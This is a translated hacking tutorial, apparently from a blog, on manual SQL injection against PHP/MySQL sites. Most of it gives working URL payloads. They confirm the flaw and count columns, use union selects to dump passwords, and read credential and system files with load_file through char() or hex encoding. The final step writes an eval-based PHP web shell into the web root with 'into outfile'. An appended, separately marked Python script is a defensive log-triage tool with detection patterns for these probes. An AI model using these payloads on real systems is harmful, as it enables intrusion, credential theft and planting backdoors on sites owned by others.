Manual PHP injection

Source: Internet
Author: User
Tags: mysql, functions

Some people may say this topic is a bit contrived. Yes, it is, but the content was prepared by me, and I hope it helps you.
 
Determine whether injection exists: first, PHP and ASP use the same injection test. Append `and 1=1` and then `and 1=2` to a dynamic parameter and compare the two returned results. If they differ, an injection point is preliminarily identified.
 
 
Determine the number of fields: next, we use the `order by` syntax to guess the field count in PHP:

http://www.bkjia.com/1.php?id=1 order by 40 // If the page returns normally, the query has at least 40 fields. Keep increasing the number until an error is returned.

When http://www.bkjia.com/1.php?id=1 order by 45 returns an error, we know the field count is 44.
 
 
Union select: once we know the field count, we use a `union select` joint query to list all the fields.

http://www.bkjia.com/1.php?id=1 and 1=2 union select 1,2,3,4 ... 44/* // here we list all 44 fields; the trailing /* tells MySQL that our statement ends here, so the remainder of the original query is commented out.

Replace the number that shows up on the page with the name of the field you want to query, and add a from clause naming the table; that field's content is then displayed in the same position. For example:

http://www.bkjia.com/1.php?id=1 and 1=2 union select 1,2,3,4 ... 30,passwd,32 ... 45 from member/* // the ... means "omitted here"; you cannot actually write it like this.
 
Several common MySQL functions: now that we have listed all the fields, some readers are probably eager to add a from clause and guess the password. In fact, the password should be left for later. Some people say MySQL's functions are no better than Access's, or even worse; that is a misunderstanding that does MySQL an injustice. Let's look at the more advanced uses of MySQL.
Here we first list several common functions: 1: system_user() 2: user() 3: current_user() 4: session_user() 5: database() 6: version() 7: load_file() ... Their meanings are as follows:

1: system username. 2: username. 3: current username. 4: username used for the database connection. 5: database name. 6: database version. 7: the function MySQL uses to read local files.

What are they good for? Functions 1 to 6 serve the following purpose:

The information these functions return plays an important role during testing: it helps us understand and analyze the target, find vulnerabilities, and broaden our thinking. For example, you can learn the system version, whether the database supports union, and whether the current user is root. Function 7 is even more useful, so let's discuss it separately.
 
This section describes the load_file() function and the tricks around it.
OK. load_file is the function MySQL uses to read local files, and it is extremely useful when the account we inject as has file read/write privileges. How do we determine whether our injection point has that privilege? Simply append `and (select count(*) from mysql.user)>0/*` to the injection point; if the page returns normally, the account can read the mysql.user table, which indicates the file read/write privilege. With it we can read sensitive system files and find configuration files, database connection files, social-engineering material, and the physical path of the web root. Next, a summary of the sensitive file list:
Windows:
load_file(char(47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105)) c:/windows/php.ini // needs no explanation
load_file(char(47,119,105,110,110,116,47,112,104,112,46,105,110,105)) c:/winnt/php.ini
load_file(char(47,119,105,110,100,111,119,115,47,109,121,46,105,110,105)) c:/windows/my.ini // the username and password are left here when the administrator logs on to MySQL
load_file(char(47,119,105,110,110,116,47,109,121,46,105,110,105)) c:/winnt/my.ini
load_file(char(111,111,116,46,105,110,105)) c:/boot.ini

Linux/Unix:
load_file(char(47,101,116,115,115,119,111,114,100,47)) /etc/password // needs no explanation
load_file(char(47,117,115,114,47,108,111,104,116,116,112,100,111,110,102,47,104,116,116,112,99,111,110,102,46)) /usr/local/httpd/conf/httpd.conf // you may find the default website directory here
load_file(char(47,117,115,114,47,108,111,97,112,104,101,99,111,110,102,47,104,116,116,112,100,111,110,102)) /usr/local/apache2/conf/httpd.conf // you may find the default website directory here
FreeBSD:
load_file(char(47)) // lists the root directory of a FreeBSD system
 
Some readers may be asking at this point: what is this? What is char? What is the string that follows it? (If you don't understand this, Google is your friend.)
In fact, even with an injection point that has file read/write privileges, directly submitting load_file(c:\boot.ini) generally produces no echo. You then have two options: 1. convert the path to hexadecimal and submit it directly to the database; 2. convert the path to decimal and use the char() function to turn it back into ASCII.
For example, c:\boot.ini in hexadecimal is "0x633A5C626F6F742E696E69", which you can use directly as load_file(0x633A5C626F6F742E696E69). Converted to decimal it is "99 58 92 98 111 111 116 46 105 110 105", which must go through char(). Before converting, do a batch replace in a text file, turning all spaces into commas, which gives load_file(char(99,58,92,98,111,111,116,46,105,110,105)). Be sure not to leave out the closing parentheses; they must be balanced.
At this point someone is probably asking: is that all? Can we go and run it now? Don't rush; read on.
 
You only need to place load_file() in a field position that is displayed on the page, ideally one with enough room to show the file you want to read. If there is not enough room, don't worry; here are a few more tricks.
 
1: Sometimes you are sure you have file read/write privileges but still cannot read the file, or get only blank output. Why? The target's system may have its permissions configured well, so your user cannot read files owned by the administrator; both NTFS and Linux can enforce this. If you have ruled that out, consider whether the content you read is being interpreted by the browser as HTML, or as script (ASP, PHP, ASPX, JSP and so on). For example, if the content contains < and > symbols, the browser will render it as markup and you will naturally see nothing. This is easy to deal with: replace those special symbols with other symbols while reading, so the browser does not interpret them. How? MySQL has the function replace(load_file(A), char(B), char(C)): when reading file A, every occurrence of character B is replaced with character C before it is displayed. So replace(load_file(A), char(60), char(32)) converts every "<" into a space, and you get the complete echo.
 
2: None of the displayed field positions has enough room for the echo, so the file comes out incomplete. What then? Use the substring(str, pos, len) function: it returns len characters of the string str starting at position pos. For example, substring(load_file(A), 50, 100) shows you 100 characters of A's content starting from the 50th; you can then page through the file step by step.
 
Advanced use of into outfile!
OK, that's enough about load_file(). There is a lot more to come! Here I want to discuss the next very important application method, which is also the focus of my study of several of Jianxin's works. We first confirm the following conditions:
1. We have obtained the physical path of a writable directory (for into outfile 'physical path').
2. union can be used (that is, MySQL 3 or a later version is required).
3. The target does not filter ' (the quotes after outfile cannot be replaced by any other function).
4. The MySQL user has the file_priv privilege (otherwise it can neither write nor read file contents).
5. The web directory is writable. MS systems generally allow this, but Linux directories are generally rwxr-xr-x, meaning group and other users have no write permission.

For condition 1, we can trigger an error message from the database; if that fails, we can obtain the path through load_file. 2 is generally fine. 3 is rarely filtered. 4, whether we have the privilege, we tested earlier. 5: if we cannot write to the website path, there are other methods, such as the startup folder, run, and so on; generally you can try the upload and image directories, most of which are readable and writable.
OK, the required conditions are confirmed. How do we use this? We split the usage into two parts.
 
Usage 1: the regular usage. We all know how to use the site's message board, upload, and similar functions to get your one-line shell onto the site and then use it.

http://www.bkjia.com/coder.php?id=1 and 1=2 union select 1,load_file(/www/home/html/upload/qingyafengping.jpg),3,4,5,6 into outfile '/www/home/html/coder.php'/* // your little shell is born.

Here, /www/home/html/upload/qingyafengping.jpg is the address of your uploaded Trojan, 3, 4, 5 and 6 are assumed field positions, and /www/home/html/ is the web path.
 
 
Usage 2 is also important. The method above has big limitations: what if the site gives you no upload function, or filters the uploaded content? Don't worry; Jianxin gave us a good idea years ago. We just execute a URL like this directly:

http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,char(your shell code here, remember to convert it to decimal or hex),3,4,5,6 into outfile '/www/home/html/coder.php'/* // so your shell is born, with no upload and nothing to be filtered.

For example:

http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,99,109,100,80,62, 5, 6 into outfile '/www/home/html/coder.php'/*
Or:
http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile '/www/home/html/coder.php'/*
Or:
http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/www/home/html/coder.php'/*

3, 4, 5 and 6 are assumed field positions, and /www/home/html/ is assumed to be the web path.
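An added defender-side example (not from the page or its author): a triage script that scans constructed access-log lines for the probes described in the sections above (the boolean test, `order by`, `union select`, `load_file`, `into outfile`) and decodes the `char()` and `0x` literals the page uses to hide file names, so an analyst can see which path a request actually targeted. The log lines, the `0x74657374` placeholder payload and the decoded paths are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic); the payloads mirror the page's probes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /1.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:12:00:02 +0000] "GET /1.php?id=1%20and%201=2 HTTP/1.1" 200 20
10.0.0.5 - - [10/Oct/2023:12:00:03 +0000] "GET /1.php?id=1%20order%20by%2045 HTTP/1.1" 500 0
10.0.0.5 - - [10/Oct/2023:12:00:04 +0000] "GET /1.php?id=1%20and%201=2%20union%20select%201,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3 HTTP/1.1" 200 900
10.0.0.5 - - [10/Oct/2023:12:00:05 +0000] "GET /1.php?id=1%20and%201=2%20union%20select%201,load_file(0x633A5C626F6F742E696E69),3 HTTP/1.1" 200 300
10.0.0.7 - - [10/Oct/2023:12:01:00 +0000] "GET /coder.php?id=1%20union%20select%201,0x74657374,3%20into%20outfile%20'/www/home/html/coder.php' HTTP/1.1" 200 0
"""

# Signatures for the techniques the page walks through, matched against the URL-decoded request.
PATTERNS = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
}
CHAR_RE = re.compile(r"char\s*\(([\d\s,]+)\)", re.I)
HEX_RE = re.compile(r"\b0x([0-9a-f]{2,})\b", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_literals(query):
    """Turn MySQL char(...) and 0x... literals back into the text they encode."""
    found = []
    for m in CHAR_RE.finditer(query):
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        if all(0 <= c < 256 for c in codes):
            found.append(bytes(codes).decode("latin-1"))
    for m in HEX_RE.finditer(query):
        if len(m.group(1)) % 2 == 0:  # skip odd-length runs, which are not byte strings
            found.append(bytes.fromhex(m.group(1)).decode("latin-1"))
    return found

def triage(log_text):
    """Return one record per suspicious request: decoded URL, matched techniques, decoded literals."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = unquote_plus(m.group(1))  # undo %20 and friends before matching
        tags = [name for name, rx in PATTERNS.items() if rx.search(url)]
        if tags:
            hits.append({"url": url, "tags": tags, "literals": decode_literals(url)})
    return hits
```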


From the hacker's XFile Blackeagle
